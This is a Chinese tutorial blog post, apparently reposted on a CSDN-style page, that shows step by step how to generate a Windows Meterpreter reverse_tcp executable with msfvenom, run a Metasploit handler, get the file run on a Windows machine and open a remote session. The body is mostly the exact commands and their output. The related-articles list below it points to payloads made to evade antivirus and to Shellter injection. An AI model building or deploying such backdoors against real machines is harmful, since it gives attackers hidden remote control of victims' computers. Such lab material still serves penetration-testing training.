Kali下Metasploit的shellcode在windows中的使用

最新推荐文章于 2022-10-12 18:23:09 发布
最新推荐文章于 2022-10-12 18:23:09 发布
阅读量698 收藏 1
点赞数
文章标签: shell 网络
原文链接:http://blog.51cto.com/13319402/2072672
版权

网络拓扑:
Kali下Metasploit的shellcode在windows中的使用
kaili系统版本:
Kali下Metasploit的shellcode在windows中的使用
注:前面的版本在生成shellcode的时候用的是msfpayload命令

1.kaili生成shellcode:
root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.侦听shellcode:

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit 
[*] Started reverse TCP handler on 192.168.152.131:1211

3.将生成的sehllcode上传至windows主机中并运行:
Kali下Metasploit的shellcode在windows中的使用

4.已经有session返回

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.152.131:1211 

[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000

5.成功拿到shell:
Kali下Metasploit的shellcode在windows中的使用

转载于:https://blog.51cto.com/13319402/2072672

weixin_33744141
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload
Kind&红衣的博客
08-13 6502
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
MSF-Shellcode生成和MS15-020 渗透利用
Ifeeexxj的博客
01-03 723
1、生成window下后门程序 A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.130 LPORT=4444 -f exe > /qq.exe 2、重新打开一个配置窗口 use exploit/multi/handler set payloads windows/meterpreter/reverse_tcp s...
metasploit生成shellcode
JMasker的博客
02-25 1658
Metasploit,可以从msfconsole生成payload。当你使用某个payload的时候,Metasploit可以添加generate,pry和reload命令。本节主要讲述generate命令的使用。 msf > use payload/windows/shell_bind_tcp msf payload(shell_bind_tcp) > help ...snip... Command Description ------- ---
利用kali的msf提取汇编机器码(shellcode
qq_41683305的博客
02-19 940
对于提取小段汇编的机器码,kali的msf提取汇编机器码非常方便 比如提取下面小段的汇编机器码 push 5 ;5=SW_SHOW push eax mov eax,0x755bdab0 call eax 首先输入 msf-nasm_shell //注意msf和-之间没有空格 然后依次输入命令 将上面内容复制到一个文本编辑器里,提取 然后每两个数字之间加入/x \x6...
Kali Linux动态shellcode注入工具:Shellter 4.0 绕过反病毒软件
文山
09-16 3056
http://bobao.360.cn/learning/detail/554.html 用Kali Linux动态shellcode注入工具:Shellter 4.0 绕过反病毒软件 2015-07-24 18:59:32 来源:360安全播报 阅读:2646次 点赞(0) 收藏(1) 分享到: 你是否在为无法通过shell代码
kali 如何编写shell_我的shellcode编写之路|MSF|Shellcode|kali linux 2017_白帽子技术/思路_i春秋社区-分享你的技术,为安全加点温度....
weixin_39606911的博客
12-22 262
本帖最后由 Demon123 于 2017-9-20 15:15 编辑install-openvas-for-broad-vulnerability-assessment.1280x600.jpg (84.8 KB, 下载次数: 40)2017-9-20 15:10 上传http://www.secist.com/archives/4809.html1.我有一个大胆的想法其实shellcode的这...
metasploitWindows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
kali-linux 工具Metasploit离线式攻击使用教程
最新发布
12-29
本教程将聚焦于Metasploit的离线攻击使用方法,这对于那些在没有互联网连接或者需要保持匿名状态的环境工作的安全专家尤其重要。 Metasploit框架是一个开源项目,它提供了大量的攻击模块,涵盖了网络扫描、漏洞...
kali文指南.pdf
01-24
该文档适合新手和英文不是很好的用户,主要文档内容为kali常用工具使用说明。
让 WSL2 Kali 虚拟机使用无线网卡
01-06
让 WSL2 Kali 虚拟机使用无线网卡为什么有这个项目改造 Kali,安装超级工具集WSL2 的改造思路编译内核代码并替换内核编译 USB/IP 工具在 Kali 挂载无线网卡在 Windows 提供 USB/IP 服务在 Kali 启动 USB/...
kali linux 源码免杀,shellcode超级免杀
weixin_35718351的博客
05-12 1646
shellcode超级免杀作者声明: 本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.日期: 2019-12-31我试过了电脑管家,火绒安全,McAfee,360, 但只有360使用手动云查杀时木马才能查出来 (目前所有软件都无法查杀!!!!! 2020-1-2) 从2019-12-29日早上起,我向我的PE-tools工具里写了一个功能,就是shellcode注入功能,写...
一段强大的shellcode
技术之路
12-06 676
代码来源于 exploit-db, 对于研究shellcode, 分析程序的运行以及linux系统有很大的帮助。 /* ;Title: polymorphic execve shellcode ;Author: d4sh&r ;Contact: https://mx.linkedin.com/in/d4v1dvc ;Category: Shellcode ;Architecture:li
metasploit shellcode编码命令....
爱杀之爪的矩阵
10-20 2912
擦 这种东西还是要记下的,不然外出出差电脑上没有这种资料,还要现场去百度搜索 太麻烦了....纠结     ruby ./msfpayload windows/messagebox EXITFUNC=seh TEXT="hack by instruder" TITLE=hack R >messagebox ruby ./msfencode -i messagebox -b '\x00' -
shellcode相关及转载
weixin_33896726的博客
10-16 112
地址1 https://www.xfocus.net/bbs/index.php?act=SE&f=2&t=58560&p=272208 =================================== int *ret; ret = (int *)&ret + 2; (*ret) = (int) shellcode; RET...
metasploit之字母数字的shellcode
Yale的博客
01-31 1350
Alphanumeric Shellcode 在攻击过程,由于被攻击的应用程序的字符串过滤功能,我们有时候可能会需要完全由字母数字组成的shellcode。 通过msfvenom可以很容易产生上述要求的shellcode。 比如我们要产生一个混合了大小写编码的字母数字的shellcode,可以如下图操作: 我们启动python的交互界面 然后把之前输出的buf的内容全部复制过来 之后将其打...
用Xshell实现Windowskali之间的文件互传
Word_Smith_的博客
10-12 3441
这时可以在我们的kali linux上面查看到刚才传入的文件(Xshell也是一样的可以查看到)找到你刚才选择在windows下面的保存文件夹,可以发现是有了的,说明传输成功。输入命令安装lrzsz:apt install lrzsz。点击用户身份验证,输入用户名和密码点击确定即可登录。输入命令rz,随意选择一个文件,点击打开即可。我在kali上面创了个xixi文件。名称随意取,然后输入主机IP。
网络安全】Metasploit 生成的 Shellcode 的导入函数解析以及执行流程分析(1)
HBohan的博客
09-13 426
2021 年 4 月,研究人员深入分析了 Cobalt Strike渗透测试技术,以及它的一些签名规避技术是如何在检测技术下失效的。在本文,我们将深入讨论Metasploit,这是一个可以与Cobalt Strike互操作的常用框架。 在本文,我们将讨论以下主题: shellcode的导入解析——Metasploit shellcode如何定位来自其他DLL的函数,以及我们如何预先计算这些值来解析来自其他有效载荷变体的任何导入; 逆向shell的执行流程——该过程非常简单; 破坏 Metasploit
metasploit添加自己的shellcode
ccplusplusjava的专栏
09-03 1061
<br />一、metasploitpayload的类型<br />二、single-stage payload的添加<br />三、multistage payload的添加<br />
MSF-Shellcode生成和使用
weixin_34301307的博客
11-12 4691
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
kali使用metasploit
08-26
Kali Linux 是一款专门为网络安全测试和渗透测试而设计的操作系统,并且内置了 Metasploit 框架。Metasploit 是一个用于开发和执行各种渗透测试和漏洞利用的工具集。 要使用 Metasploit,首先打开终端并输入"msfconsole"命令,这会启动 Metasploit 控制台。在控制台,你可以使用各种命令来搜索和利用漏洞。 例如,你可以使用"search"命令来搜索特定漏洞或攻击模块。例如,输入"search exploit"将会列出所有可用的漏洞利用模块。 接下来,你可以使用"use"命令选择一个特定的漏洞利用模块。例如,输入"use exploit/windows/smb/ms08_067_netapi"将选择 MS08-067 漏洞利用模块。 然后,你可以使用"show options"命令查看该模块的可配置选项。根据需要,你可以设置不同的参数值。 最后,使用"exploit"命令执行漏洞利用。根据具体情况,它可能会尝试获取对目标系统的访问权限或执行其他操作。 重要提示:请确保你在合法授权和合法目的的情况下使用 Metasploit 工具。在进行任何渗透测试活动之前,请确保已经取得相关授权和充分测试环境。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值